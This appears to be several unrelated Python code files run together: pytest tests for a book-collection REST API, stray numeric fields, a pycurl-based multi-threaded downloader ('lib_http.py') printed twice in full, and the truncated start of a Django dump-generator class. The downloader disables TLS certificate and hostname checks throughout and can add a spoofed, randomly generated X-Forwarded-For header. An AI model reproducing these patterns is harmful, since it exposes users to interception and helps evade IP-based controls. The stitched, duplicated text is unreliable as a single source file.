def test_book_list_post_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that POST to book-list route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data, status=403)
assert res.status_code == 403
def test_book_list_post_incomplete_data_gets_400_status_code(testapp, one_user):
"""Test that POST to book-list route gets 400 status code for missing data."""
data = {
'email': one_user.email,
'password': 'password',
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data, status=400)
assert res.status_code == 400
def test_book_list_post_incorrect_date_gets_400_status_code(testapp, one_user):
"""Test that POST to book-list route gets 400 status code for bad data."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%Y-%m-%d')
}
res = testapp.post('/books', data, status=400)
assert res.status_code == 400
def test_book_list_post_complete_data_gets_201_status_code(testapp, one_user):
"""Test that POST to book-list route gets 201 status code."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data)
assert res.status_code == 201
def test_book_list_post_complete_data_adds_book_to_database(testapp, testapp_session, one_user):
"""Test that POST to book-list route creates a new Book."""
num_books = len(testapp_session.query(Book).all())
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
testapp.post('/books', data)
assert len(testapp_session.query(Book).all()) == num_books + 1
def test_book_list_post_sets_email_user_as_book_owner(testapp, testapp_session, one_user):
"""Test that POST to book-list route sets user with email as book owner."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data)
new_book = testapp_session.query(Book).get(res.json['id'])
assert new_book.user.email == one_user.email
def test_book_list_post_complete_data_returns_json_with_new_book_info(testapp, one_user):
"""Test that POST to book-list route gets JSON with details for new Book."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.post('/books', data)
for prop in ['title', 'author', 'isbn', 'pub_date']:
assert res.json[prop] == data[prop]
assert res.json['id'] is not None
def test_book_list_post_data_without_values_sets_values_to_none(testapp, one_user):
"""Test that POST to book-list route sets missing values to None."""
data = {
'email': one_user.email,
'password': 'password',
'title': FAKE.sentence(nb_words=3),
}
res = testapp.post('/books', data)
assert res.json['author'] is None
assert res.json['isbn'] is None
assert res.json['pub_date'] is None
def test_book_list_get_correct_auth_all_books_for_user(testapp, testapp_session, one_user):
"""Test that GET to book-list route lists all books for the users."""
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books', data)
user_books = testapp_session.query(User).get(one_user.id).books
assert len(res.json) == len(user_books)
def test_book_list_get_correct_auth_all_book_details(testapp, one_user):
"""Test that GET to book-list route has details for every book."""
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books', data)
for book in res.json:
assert all(prop in book for prop in
['id', 'title', 'author', 'isbn', 'pub_date'])
def test_book_id_other_methods_gets_404_status_code(testapp):
"""Test that other HTTP method requests to book-id get a 404 status code."""
for method in ('post',):
res = getattr(testapp, method)('/books/1', status=404)
assert res.status_code == 404
def test_book_id_get_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
"""Test that GET to book-id route gets 400 status code for missing auth."""
res = testapp.get('/books/1', status=400)
assert res.status_code == 400
def test_book_id_get_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that GET to book-id route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>',
}
res = testapp.get('/books/1', data, status=403)
assert res.status_code == 403
def test_book_id_get_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
"""Test that GET to book-id route gets 404 status code for book that does not beling to user."""
book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books/{}'.format(book.id), data, status=404)
assert res.status_code == 404
def test_book_id_get_correct_auth_has_200_response_code(testapp, testapp_session, one_user):
"""Test that GET to book-id route gets 200 status code for good auth."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books/{}'.format(book.id), data)
assert res.status_code == 200
def test_book_id_get_correct_auth_returns_json_with_book_info(testapp, testapp_session, one_user):
"""Test that GET to book-id route return JSON with correct book data."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.get('/books/{}'.format(book.id), data)
for prop in ['id', 'title', 'author', 'isbn']:
assert res.json[prop] == getattr(book, prop)
assert res.json['pub_date'] == book.pub_date.strftime('%m/%d/%Y')
def test_book_id_put_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
"""Test that PUT to book-id route gets 400 status code for missing auth."""
res = testapp.put('/books/1', status=400)
assert res.status_code == 400
def test_book_id_put_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that PUT to book-id route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>',
}
res = testapp.put('/books/1', data, status=403)
assert res.status_code == 403
def test_book_id_put_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
"""Test that PUT to book-id route gets 404 status code for book that does not beling to user."""
book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
data = {
'email': one_user.email,
'password': 'password',
}
res = testapp.put('/books/{}'.format(book.id), data, status=404)
assert res.status_code == 404
def test_book_id_put_correct_auth_incorrect_date_gets_400_status_code(testapp, testapp_session, one_user):
"""Test that POST to book-id route gets 400 status code for bad data."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
'pub_date': FAKE.date(pattern='%Y-%m-%d')
}
res = testapp.put('/books/{}'.format(book.id), data, status=400)
assert res.status_code == 400
def test_book_id_put_correct_auth_has_200_response_code(testapp, testapp_session, one_user):
"""Test that PUT to book-id route gets 200 status code for good auth."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
'author': FAKE.name()
}
res = testapp.put('/books/{}'.format(book.id), data)
assert res.status_code == 200
def test_book_id_put_correct_auth_does_not_add_book_to_database(testapp, testapp_session, one_user):
"""Test that PUT to book-id route does not create a new Book."""
book = testapp_session.query(User).get(one_user.id).books[0]
num_books = len(testapp_session.query(Book).all())
data = {
'email': one_user.email,
'password': 'password',
'isbn': FAKE.isbn13(separator="-")
}
testapp.put('/books/{}'.format(book.id), data)
assert len(testapp_session.query(Book).all()) == num_books
def test_book_id_put_correct_auth_updates_book_in_database(testapp, testapp_session, one_user):
"""Test that PUT to book-id route updates the correct book in the database."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
'author': FAKE.name()
}
testapp.put('/books/{}'.format(book.id), data)
updated_book = testapp.get('/books/{}'.format(book.id), data)
assert updated_book.json['author'] == data['author']
def test_book_id_put_correct_auth_returns_json_with_updated_book_info(testapp, testapp_session, one_user):
"""Test that PUT to book-id route returns JSON with updated book data."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password',
'author': FAKE.name(),
'isbn': FAKE.isbn13(separator="-"),
'pub_date': FAKE.date(pattern='%m/%d/%Y')
}
res = testapp.put('/books/{}'.format(book.id), data)
for prop in ['id', 'title', 'author', 'isbn', 'pub_date']:
if prop in data:
assert res.json[prop] == data[prop]
else:
assert res.json[prop] == getattr(book, prop)
def test_book_id_delete_missing_auth_gets_400_status_code(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route gets 400 status code for missing auth."""
res = testapp.delete('/books/1', status=400)
assert res.status_code == 400
def test_book_id_delete_incorrect_auth_gets_403_status_code(testapp, one_user):
"""Test that DELETE to book-id route gets 403 status code for bad auth."""
data = {
'email': one_user.email,
'password': '<PASSWORD>'
}
res = testapp.delete('/books/1', data, status=403)
assert res.status_code == 403
def test_book_id_delete_correct_auth_not_users_book_gets_404_status_code(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route gets 404 status code for book that does not beling to user."""
book = testapp_session.query(Book).filter(Book.user_id != one_user.id).first()
data = {
'email': one_user.email,
'password': 'password'
}
res = testapp.delete('/books/{}'.format(book.id), data, status=404)
assert res.status_code == 404
def test_book_id_delete_correct_auth_has_204_response_code(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route gets 204 status code for good auth."""
book = testapp_session.query(User).get(one_user.id).books[0]
data = {
'email': one_user.email,
'password': 'password'
}
res = testapp.delete('/books/{}'.format(book.id), data)
assert res.status_code == 204
def test_book_id_delete_correct_auth_removes_book_from_database(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route does not create a new Book."""
book = testapp_session.query(User).get(one_user.id).books[0]
num_books = len(testapp_session.query(Book).all())
data = {
'email': one_user.email,
'password': 'password'
}
testapp.delete('/books/{}'.format(book.id), data)
assert len(testapp_session.query(Book).all()) == num_books - 1
def test_book_id_delete_correct_auth_removes_book_by_id(testapp, testapp_session, one_user):
"""Test that DELETE to book-id route removes the correct Book by id."""
book = testapp_session.query(User).get(one_user.id).books[0]
book_id = book.id
data = {
'email': one_user.email,
'password': 'password'
}
res = testapp.get('/books/{}'.format(book_id), data)
assert res.status_code == 200
testapp.delete('/books/{}'.format(book_id), data)
res = testapp.get('/books/{}'.format(book_id), data, status=404)
assert res.status_code == 404 | 0.709321 | 0.565179 |
import pycurl
import os
import sys
import StringIO
import urllib2
import lib_TheardPool2
import lib_func
import shutil
import gzip
import urlparse
import re
import math
flock=lib_TheardPool2.getlock()
curlopts={pycurl.USERAGENT:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0",\
pycurl.HTTPHEADER:["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",\
"Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",\
"Accept-Encoding: gzip, deflate",\
"Connection: keep-alive"]
}
class bmdownload:
"""blackmoon download class"""
def __init__(self,log=1):
self.log=log
self.flock=lib_TheardPool2.getlock()
def download(self,address,savepath,savename="",opts={},thread=1):
if not address:
lib_func.printstr("You should input vaild urls",2)
return
objc=self.initobjc(opts)
try:
finfo=self.getfileinfo(objc,address)
except Exception as e:
lib_func.printstr(str(e),"DD:Get ddinfo faile:")
return
opts=lib_func.copydict(opts,(pycurl.URL,finfo[0]))
if finfo[1]==0:
lib_func.printstr("Have error in download",2)
return
block=self.getblock(finfo[1])
fname=savepath+'/'+savename
dlinfo={'url':finfo[0],'save':fname,'size':finfo[1],'block':block,'status':[0 for i in range(int(math.ceil(float(finfo[1])/block)))]}
self.printdd(dlinfo)
f=self.getfp(dlinfo['save'],dlinfo['size'])
pool=lib_TheardPool2.threadpool(thread,start=False)
pool.initsubthead(self.initsub,(opts,))
[pool.addtask(self.getbytes,(dlinfo,i,f))for i in range(len(dlinfo['status']))]
pool.start()
pool.waitPoolComplete(self.getspeed)
f.close()
def getspeed(self,pool):
speed=0
for thread in pool.threads:
#print "%.2f kb/s" %(thread.threadvars['speed']/1024),
speed+=thread.threadvars['speed']
#print ''
if self.log:
lib_func.printstr("%.2f kb/s" %(speed/1024),"DD:Speed:")
else:
pass
def getfp(self,savepath,size):
if os.path.isfile(savepath+'.bmcache'):
f=None
pass
else:
f=open(savepath,'wb')
f.seek(size-3)
f.write('EOF')
f.flush()
return f
def printdd(self,dlinfo):
lib_func.printstr(dlinfo['url'],"DD:URL:")
lib_func.printstr(dlinfo['save'],"DD:SAVE:")
lib_func.printstr(dlinfo['size'],"DD:SIZE:")
def initobjc(self,opts):
objc=pycurl.Curl()
for key,value in curlopts.iteritems():
objc.setopt(key,value)
for key,value in opts.iteritems():
objc.setopt(key,value)
objc.setopt(pycurl.SSL_VERIFYPEER, 0)
objc.setopt(pycurl.SSL_VERIFYHOST, 0)
#objc.setopt(pycurl.TIMEOUT,10)
return objc
def initsub(self,opts,pool):
for thread in pool.threads:
thread.threadvars['objc']=self.initobjc(opts)
thread.threadvars['speed']=0
def write2file(self,objs,dlinfo,index,fp):
self.flock.acquire()
fp.seek(index*dlinfo['block'])
fp.write(objs.getvalue())
self.flock.release()
def getbytes(self,dlinfo,index,fp,threadvar):
objc=threadvar['objc']
objs=StringIO.StringIO()
objc.setopt(pycurl.WRITEFUNCTION, objs.write)
objc.setopt(pycurl.RANGE,"%d-%d" %(index*dlinfo['block'],(index+1)*dlinfo['block']-1))
for i in range(3):
try:
objc.perform()
threadvar['speed']=objc.getinfo(pycurl.SPEED_DOWNLOAD)
self.write2file(objs,dlinfo,index,fp)
return
except Exception as e:
lib_func.printstr(str(e),"DD:Exception:")
lib_func.printstr("Time out ,can't download",2)
def getblock(self,size):
if size<=10*1024:
block=1024 #1KB
elif size<=100*1024:
block=1024*10 #10KB
elif size<=1024*1024:
block=1024*100 #100KB
else:
block=1024*500 #500KB
'''
elif size<=1024*1024*10:
block=1024*1024 #1M
else:
block=1024*1024*1 #2M
'''
return block
def getfileinfo(self,objc,url,follow=3):
#get real download link and file size
head=list()
head.extend(curlopts[pycurl.HTTPHEADER])
head.append('Range: bytes=0-0')
objc.setopt(pycurl.HTTPHEADER,head)
eurl=geteffectiveurl(objc,url,5)
size=0
name=""
head,body=get4url(eurl,{},objc)
parseh=parsehttphead(head)
if parseh.has_key('content-range'):
size=int(parseh['content-range'].split('/')[1])
if parseh.has_key('content-disposition'):
m=re.search(r'filename=\"(.*?)\"',parseh['content-disposition'])
if m:
name=m.groups()[0]
return eurl,size,name
def getdata4info(url,opts={},objc=None,objs=None,objh=None,timeout=5):
if not objc:
objc=pycurl.Curl()
objc.setopt(objc.SSL_VERIFYPEER, 0) # https
objc.setopt(objc.SSL_VERIFYHOST, 0)
if not objs:
objs=StringIO.StringIO()
if not objh:
objh=StringIO.StringIO()
objc.setopt(pycurl.URL,url.strip())
objc.setopt(pycurl.TIMEOUT,timeout)
objc.setopt(pycurl.WRITEFUNCTION, objs.write)
objc.setopt(pycurl.HEADERFUNCTION,objh.write)
for key,value in opts.iteritems():
objc.setopt(key,value)
objc.perform()
return objh.getvalue(),objs.getvalue()
def get4url(url,curlopts={},objc=None,timeout=5):
if url:
return getdata4info(url,curlopts,objc,timeout=timeout)
def parsehttphead(head):
heads=head.split('\r\n')
hdt={}
for dt in heads:
dt=dt.strip()
if dt[:4]=="HTTP":
lt=dt.split(' ')
hdt['version']=lt[0]
hdt['code']=lt[1]
if len(lt)==3:
hdt['status']=lt[2]
else:
hdt['status']=''
elif dt:
key,value=dt.split(':',1)
hdt[key.lower()]=value.strip()
return hdt
def gethttpresponse(hhead,hbody):
if hhead.has_key('content-encoding') and hhead['content-encoding'].find('gzip')>=0:
return gzip.GzipFile(fileobj=StringIO.StringIO(hbody)).read()
else:
return hbody
def getpyurl(copt={},proxy=None,ffx=None):
"""ffx can set 'sgcc' and other,mean set the ffx head to this type"""
obj=pycurl.Curl()
obj.setopt(pycurl.SSL_VERIFYPEER, 0) # https
obj.setopt(pycurl.SSL_VERIFYHOST, 0)
if ffx:
ffxip=getrandomip(ffx)
opts={pycurl.USERAGENT:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0",\
pycurl.HTTPHEADER:["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",\
"Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",\
"Accept-Encoding: gzip, deflate",\
"Connection: keep-alive"]
}
if ffx:
opts[pycurl.HTTPHEADER].append("X-Forwarded-For: %s" %ffxip)
for key,value in opts.iteritems():
obj.setopt(key,value)
if obj:
for key,value in copt.iteritems():
obj.setopt(key,value)
if proxy:
obj.setopt(pycurl.PROXY,proxy)
return obj
def getrandomip(flag='net'):
import random
if flag=='sgcc':
p1=10
else:
p1=random.randint(1,254)
p2=random.randint(1,254)
p3=random.randint(1,254)
p4=random.randint(1,254)
return "%d.%d.%d.%d" %(p1,p2,p3,p4)
def getlinks4soup(soup,filter='link|.*',host=None):
lks=[]
import re
tags={'a':'href','img':'src','link':'src','javascript':'src'}
filter=filter.split('|')
for key,value in tags.iteritems():
links=soup.findAll(key)
for link in links:
lk=link[value].strip()
if host and lk[:4]=='http':
lk=host+lk
if filter[0]=='link' and re.search(filter[1],lk):
lks.append(lk)
elif filter[0]=='type':
inx=lk.rfind('.')
if inx and re.search(filter,lk[inx+1:]):
lks.append(lk)
return lks
def getdomain4url(urls):
up=urlparse.urlsplit(urls)
return "%s://%s" %(up.scheme,up.netloc)
def u28quote(string):
return urllib2.quote(string.encode('utf8'))
def geteffectiveurl(objc,url,nums=3):
objc.setopt(pycurl.FOLLOWLOCATION,0)
for i in range(nums):
head,body=get4url(url,{},objc)
hdict=parsehttphead(head)
if hdict.has_key('location'):
url=hdict['location']
continue
return url.strip()
return None
"""
def downdata4info(downinfo,fhand,num,threadvars):
objc=threadvars['objc']
#objs=threadvars['objs']
objc.setopt(objc.SSL_VERIFYPEER, 0) # https
objc.setopt(objc.SSL_VERIFYHOST, 0)
objc.setopt(pycurl.URL,downinfo['location'])
objs=StringIO.StringIO()
#objc.setopt(objc.VERBOSE, 1)
#objc.setopt(objc.DEBUGFUNCTION, test)
objc.setopt(pycurl.WRITEFUNCTION, objs.write)
#objc.setopt(pycurl.HEADERFUNCTION,objh.write)
#objc.setopt(pycurl.FOLLOWLOCATION, 1)
#objc.setopt(pycurl.HTTPHEADER,['Range: 0-1024'])
#objc.setopt(pycurl.HEADER,True) #get head and body from stringio
#objc.setopt(pycurl.WRITEHEADER,h)
objc.setopt(pycurl.RANGE,"%d-%d" %(num*downinfo['block'],(num+1)*downinfo['block']-1))
#objc.setopt(pycurl.USERAGENT,"netdisk;5.3.4.5;PC;PC-Windows;6.2.9200;WindowsBaiduYunGuanJia")
#objc.setopt(pycurl.PROXY,"http://127.0.0.1:8088")
objc.perform()
flock.acquire()
fhand.seek(num*downinfo['block'])
fhand.write(objs.getvalue())
downinfo['status'][num]=1
flock.release()
objs.close()
threadvars['speed']=objc.getinfo(objc.SPEED_DOWNLOAD)/1024
print "HTTP-code:", objc.getinfo(objc.HTTP_CODE)
print "Total-time:", objc.getinfo(objc.TOTAL_TIME)
print "Download speed: %.2f bytes/second" % objc.getinfo(objc.SPEED_DOWNLOAD)
print "Document size: %d bytes" % objc.getinfo(objc.SIZE_DOWNLOAD)
print "Effective URL:", objc.getinfo(objc.EFFECTIVE_URL)
print "Content-type:", objc.getinfo(objc.CONTENT_TYPE)
print "Namelookup-time:", objc.getinfo(objc.NAMELOOKUP_TIME)
print "Redirect-time:", objc.getinfo(objc.REDIRECT_TIME)
print "Redirect-count:", objc.getinfo(objc.REDIRECT_COUNT)
print "====================="
""" | lib_http.py | import pycurl
import os
import sys
import StringIO
import urllib2
import lib_TheardPool2
import lib_func
import shutil
import gzip
import urlparse
import re
import math
flock=lib_TheardPool2.getlock()
curlopts={pycurl.USERAGENT:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0",\
pycurl.HTTPHEADER:["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",\
"Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",\
"Accept-Encoding: gzip, deflate",\
"Connection: keep-alive"]
}
class bmdownload:
"""blackmoon download class"""
def __init__(self,log=1):
self.log=log
self.flock=lib_TheardPool2.getlock()
def download(self,address,savepath,savename="",opts={},thread=1):
if not address:
lib_func.printstr("You should input vaild urls",2)
return
objc=self.initobjc(opts)
try:
finfo=self.getfileinfo(objc,address)
except Exception as e:
lib_func.printstr(str(e),"DD:Get ddinfo faile:")
return
opts=lib_func.copydict(opts,(pycurl.URL,finfo[0]))
if finfo[1]==0:
lib_func.printstr("Have error in download",2)
return
block=self.getblock(finfo[1])
fname=savepath+'/'+savename
dlinfo={'url':finfo[0],'save':fname,'size':finfo[1],'block':block,'status':[0 for i in range(int(math.ceil(float(finfo[1])/block)))]}
self.printdd(dlinfo)
f=self.getfp(dlinfo['save'],dlinfo['size'])
pool=lib_TheardPool2.threadpool(thread,start=False)
pool.initsubthead(self.initsub,(opts,))
[pool.addtask(self.getbytes,(dlinfo,i,f))for i in range(len(dlinfo['status']))]
pool.start()
pool.waitPoolComplete(self.getspeed)
f.close()
def getspeed(self,pool):
speed=0
for thread in pool.threads:
#print "%.2f kb/s" %(thread.threadvars['speed']/1024),
speed+=thread.threadvars['speed']
#print ''
if self.log:
lib_func.printstr("%.2f kb/s" %(speed/1024),"DD:Speed:")
else:
pass
def getfp(self,savepath,size):
if os.path.isfile(savepath+'.bmcache'):
f=None
pass
else:
f=open(savepath,'wb')
f.seek(size-3)
f.write('EOF')
f.flush()
return f
def printdd(self,dlinfo):
lib_func.printstr(dlinfo['url'],"DD:URL:")
lib_func.printstr(dlinfo['save'],"DD:SAVE:")
lib_func.printstr(dlinfo['size'],"DD:SIZE:")
def initobjc(self,opts):
objc=pycurl.Curl()
for key,value in curlopts.iteritems():
objc.setopt(key,value)
for key,value in opts.iteritems():
objc.setopt(key,value)
objc.setopt(pycurl.SSL_VERIFYPEER, 0)
objc.setopt(pycurl.SSL_VERIFYHOST, 0)
#objc.setopt(pycurl.TIMEOUT,10)
return objc
def initsub(self,opts,pool):
for thread in pool.threads:
thread.threadvars['objc']=self.initobjc(opts)
thread.threadvars['speed']=0
def write2file(self,objs,dlinfo,index,fp):
self.flock.acquire()
fp.seek(index*dlinfo['block'])
fp.write(objs.getvalue())
self.flock.release()
def getbytes(self,dlinfo,index,fp,threadvar):
objc=threadvar['objc']
objs=StringIO.StringIO()
objc.setopt(pycurl.WRITEFUNCTION, objs.write)
objc.setopt(pycurl.RANGE,"%d-%d" %(index*dlinfo['block'],(index+1)*dlinfo['block']-1))
for i in range(3):
try:
objc.perform()
threadvar['speed']=objc.getinfo(pycurl.SPEED_DOWNLOAD)
self.write2file(objs,dlinfo,index,fp)
return
except Exception as e:
lib_func.printstr(str(e),"DD:Exception:")
lib_func.printstr("Time out ,can't download",2)
def getblock(self,size):
if size<=10*1024:
block=1024 #1KB
elif size<=100*1024:
block=1024*10 #10KB
elif size<=1024*1024:
block=1024*100 #100KB
else:
block=1024*500 #500KB
'''
elif size<=1024*1024*10:
block=1024*1024 #1M
else:
block=1024*1024*1 #2M
'''
return block
def getfileinfo(self,objc,url,follow=3):
#get real download link and file size
head=list()
head.extend(curlopts[pycurl.HTTPHEADER])
head.append('Range: bytes=0-0')
objc.setopt(pycurl.HTTPHEADER,head)
eurl=geteffectiveurl(objc,url,5)
size=0
name=""
head,body=get4url(eurl,{},objc)
parseh=parsehttphead(head)
if parseh.has_key('content-range'):
size=int(parseh['content-range'].split('/')[1])
if parseh.has_key('content-disposition'):
m=re.search(r'filename=\"(.*?)\"',parseh['content-disposition'])
if m:
name=m.groups()[0]
return eurl,size,name
def getdata4info(url,opts={},objc=None,objs=None,objh=None,timeout=5):
if not objc:
objc=pycurl.Curl()
objc.setopt(objc.SSL_VERIFYPEER, 0) # https
objc.setopt(objc.SSL_VERIFYHOST, 0)
if not objs:
objs=StringIO.StringIO()
if not objh:
objh=StringIO.StringIO()
objc.setopt(pycurl.URL,url.strip())
objc.setopt(pycurl.TIMEOUT,timeout)
objc.setopt(pycurl.WRITEFUNCTION, objs.write)
objc.setopt(pycurl.HEADERFUNCTION,objh.write)
for key,value in opts.iteritems():
objc.setopt(key,value)
objc.perform()
return objh.getvalue(),objs.getvalue()
def get4url(url,curlopts={},objc=None,timeout=5):
if url:
return getdata4info(url,curlopts,objc,timeout=timeout)
def parsehttphead(head):
heads=head.split('\r\n')
hdt={}
for dt in heads:
dt=dt.strip()
if dt[:4]=="HTTP":
lt=dt.split(' ')
hdt['version']=lt[0]
hdt['code']=lt[1]
if len(lt)==3:
hdt['status']=lt[2]
else:
hdt['status']=''
elif dt:
key,value=dt.split(':',1)
hdt[key.lower()]=value.strip()
return hdt
def gethttpresponse(hhead,hbody):
if hhead.has_key('content-encoding') and hhead['content-encoding'].find('gzip')>=0:
return gzip.GzipFile(fileobj=StringIO.StringIO(hbody)).read()
else:
return hbody
def getpyurl(copt={},proxy=None,ffx=None):
"""ffx can set 'sgcc' and other,mean set the ffx head to this type"""
obj=pycurl.Curl()
obj.setopt(pycurl.SSL_VERIFYPEER, 0) # https
obj.setopt(pycurl.SSL_VERIFYHOST, 0)
if ffx:
ffxip=getrandomip(ffx)
opts={pycurl.USERAGENT:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0",\
pycurl.HTTPHEADER:["Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",\
"Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",\
"Accept-Encoding: gzip, deflate",\
"Connection: keep-alive"]
}
if ffx:
opts[pycurl.HTTPHEADER].append("X-Forwarded-For: %s" %ffxip)
for key,value in opts.iteritems():
obj.setopt(key,value)
if obj:
for key,value in copt.iteritems():
obj.setopt(key,value)
if proxy:
obj.setopt(pycurl.PROXY,proxy)
return obj
def getrandomip(flag='net'):
import random
if flag=='sgcc':
p1=10
else:
p1=random.randint(1,254)
p2=random.randint(1,254)
p3=random.randint(1,254)
p4=random.randint(1,254)
return "%d.%d.%d.%d" %(p1,p2,p3,p4)
def getlinks4soup(soup,filter='link|.*',host=None):
lks=[]
import re
tags={'a':'href','img':'src','link':'src','javascript':'src'}
filter=filter.split('|')
for key,value in tags.iteritems():
links=soup.findAll(key)
for link in links:
lk=link[value].strip()
if host and lk[:4]=='http':
lk=host+lk
if filter[0]=='link' and re.search(filter[1],lk):
lks.append(lk)
elif filter[0]=='type':
inx=lk.rfind('.')
if inx and re.search(filter,lk[inx+1:]):
lks.append(lk)
return lks
def getdomain4url(urls):
up=urlparse.urlsplit(urls)
return "%s://%s" %(up.scheme,up.netloc)
def u28quote(string):
return urllib2.quote(string.encode('utf8'))
def geteffectiveurl(objc,url,nums=3):
objc.setopt(pycurl.FOLLOWLOCATION,0)
for i in range(nums):
head,body=get4url(url,{},objc)
hdict=parsehttphead(head)
if hdict.has_key('location'):
url=hdict['location']
continue
return url.strip()
return None
"""
def downdata4info(downinfo,fhand,num,threadvars):
objc=threadvars['objc']
#objs=threadvars['objs']
objc.setopt(objc.SSL_VERIFYPEER, 0) # https
objc.setopt(objc.SSL_VERIFYHOST, 0)
objc.setopt(pycurl.URL,downinfo['location'])
objs=StringIO.StringIO()
#objc.setopt(objc.VERBOSE, 1)
#objc.setopt(objc.DEBUGFUNCTION, test)
objc.setopt(pycurl.WRITEFUNCTION, objs.write)
#objc.setopt(pycurl.HEADERFUNCTION,objh.write)
#objc.setopt(pycurl.FOLLOWLOCATION, 1)
#objc.setopt(pycurl.HTTPHEADER,['Range: 0-1024'])
#objc.setopt(pycurl.HEADER,True) #get head and body from stringio
#objc.setopt(pycurl.WRITEHEADER,h)
objc.setopt(pycurl.RANGE,"%d-%d" %(num*downinfo['block'],(num+1)*downinfo['block']-1))
#objc.setopt(pycurl.USERAGENT,"netdisk;5.3.4.5;PC;PC-Windows;6.2.9200;WindowsBaiduYunGuanJia")
#objc.setopt(pycurl.PROXY,"http://127.0.0.1:8088")
objc.perform()
flock.acquire()
fhand.seek(num*downinfo['block'])
fhand.write(objs.getvalue())
downinfo['status'][num]=1
flock.release()
objs.close()
threadvars['speed']=objc.getinfo(objc.SPEED_DOWNLOAD)/1024
print "HTTP-code:", objc.getinfo(objc.HTTP_CODE)
print "Total-time:", objc.getinfo(objc.TOTAL_TIME)
print "Download speed: %.2f bytes/second" % objc.getinfo(objc.SPEED_DOWNLOAD)
print "Document size: %d bytes" % objc.getinfo(objc.SIZE_DOWNLOAD)
print "Effective URL:", objc.getinfo(objc.EFFECTIVE_URL)
print "Content-type:", objc.getinfo(objc.CONTENT_TYPE)
print "Namelookup-time:", objc.getinfo(objc.NAMELOOKUP_TIME)
print "Redirect-time:", objc.getinfo(objc.REDIRECT_TIME)
print "Redirect-count:", objc.getinfo(objc.REDIRECT_COUNT)
print "====================="
""" | 0.096408 | 0.060418 |
import os
import json
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django_datajsonar.models import Field, Catalog, Metadata
from series_tiempo_ar_api.apps.dump.generator.metadata import MetadataCsvGenerator
from series_tiempo_ar_api.apps.dump.generator.sources import SourcesCsvGenerator
from series_tiempo_ar_api.apps.dump.generator.values_csv import ValuesCsvGenerator
from series_tiempo_ar_api.apps.management import meta_keys
from series_tiempo_ar_api.apps.dump.models import GenerateDumpTask
from series_tiempo_ar_api.libs.datajsonar_repositories.series_repository import SeriesRepository
from .full_csv import FullCsvGenerator
class DumpGenerator:
dump_dir = os.path.join(settings.MEDIA_ROOT, 'dump')
def __init__(self, task: GenerateDumpTask, catalog: str = None):
self.fields = {}
self.themes = {}
self.task = task
self.catalog = catalog
self.init_data()
if not os.path.exists(self.dump_dir):
os.makedirs(self.dump_dir)
def init_data(self):
